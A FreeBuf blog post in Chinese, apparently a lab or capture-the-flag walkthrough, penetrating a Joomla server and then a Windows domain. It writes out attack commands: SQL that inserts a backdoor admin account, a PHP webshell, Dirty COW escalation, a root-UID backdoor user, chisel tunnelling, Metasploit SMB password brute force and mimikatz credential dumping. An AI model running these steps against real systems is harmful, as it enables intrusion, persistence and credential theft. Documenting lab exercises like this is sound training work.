官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
GODUNTONG- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
声明:
本文仅供学习网络安全行业的朋友们参考,同时是记录自己成长的随笔记录,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,我们将不承担任何法律及连带责任。
一、环境搭建
1.环境搭建测试
1.1 网络所示
目标:域控中存在一份重要文件。
本次环境为黑盒测试,不提供虚拟机账号密码。
2.信息收集
2.1 CMS识别
python3 cmseek.py -u http://192.168.134.130/
2.2 端口扫描
nmap -A -sV 192.168.134.130
2.3 目录探测
DirBuster目录探测
后台地址:http://192.168.134.130/administrator/
二、漏洞探测与提权
1、漏洞利用
1.1 从信息泄露到登录后台
cmseek扫描到一个配置文件http://192.168.134.130/configuration.php~,尝试访问。
尝试连接mysql
Joomla后台密码为MD5加密,破解代价很大,尝试重置管理员密码,附:如何恢复或重置管理员密码?
MySQL [joomla]> INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2', 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
MySQL [joomla]> INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');
登录后台
1.2 Joomla远程命令执行
进入extensions -> templates -> templates -> beez3 -> new file,新建文件123.php。
URL:http://192.168.134.130/templates/beez3/123.php
冰蝎连接
2、继续收集信息
发现有可用的账号密码:wwwuser/wwwuser_123Aqx
尝试登录后继续收集信息
3、提权及权限维持
## 脏牛提权
gcc -pthread dirty.c -o dirty -lcrypt
./dirty godunt123
创建后门账号godunt
useradd -p `openssl passwd -1 -salt 'salt' 123456` godunt123 -o -u 0 -g root -G root -s /bin/bash -d /home/mysqld
三、内网渗透
1、内网主机探测
[firefart@localhost tmp]# for k in $( seq 1 255);do ping -c 1 192.168.93.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
2、构建通道
1.1 代理转发
[firefart@localhost ~]# ./chisel server -p 1080 --socks5
root@kali:~/05_Channel_construction/chisel_1.7.6# ./chisel client 192.168.134.130:1080 socks
修改/etc/proxychains.conf。
3、内网扫描
3.1 系统信息
我们可以利用Metasploit的auxiliary/scanner/smb/smb_version获取一些系统信息。
结果如下:
3.2 端口信息
root@kali:~# proxychains nmap -p21,22,135,445,80,53,3389,8080,1433,8080 192.168.93.10
root@kali:~# proxychains nmap -p21,22,135,445,80,53,3389,8080,1433,8080 192.168.93.20
root@kali:~# proxychains nmap -p21,22,135,445,80,53,3389,8080,1433,8080 192.168.93.30
## 开放53端口,很有可能是域控
3.3 漏洞信息
三台主机都开启了445端口,测试下MS17-010,利用auxiliary/scanner/smb/smb_ms17_010。
3.4 密码爆破
尝试爆破administrator的密码,利用auxiliary/scanner/smb/smb_login模块配合自己收藏的字典。
msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > set SMBUSER administrator
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /root/11_password_dic/PasswordDic-master/2021_top100.txt
msf6 auxiliary(scanner/smb/smb_login) > set threads 20
msf6 auxiliary(scanner/smb/smb_login) > exploit
4、横向移动
4.1 wmiexec
使用wmiexec获取域成员主机(192.168.93.20/192.168.93.30)权限。
4.2 获取主机凭证
上传mimikatz.exe到192.168.93.20。
root@kali:~# proxychains smbclient //192.168.93.20/C$ -U administrator
Enter: 123qwe!ASD
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log
获得域成员administrator/zxcASDqw123!!的密码。
5、域渗透
5.1 IPC$
C:\>net use \\192.168.93.10\admin$ zxcASDqw123!! /user:test\administrator
#系统默认路径c:\windows\下
C:\>dir \\192.168.93.10\C$\users\administrator\Documents
C:\>type \\192.168.93.10\C$\users\administrator\Documents\flag.txt
得到Flag!
总结回顾
本期是ATT&CK实战系列分享第三篇,在本着完成工作任务之余,也需要不断学习、不断进步。一句话,信任前期跟着思路慢慢学习复现,后期逐渐积累吸收,才会有更大的收获。承蒙厚爱,ATT&CK实战系列持续更新!
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
ATT & CK 实战系列
- 4 文章数
- 15 关注者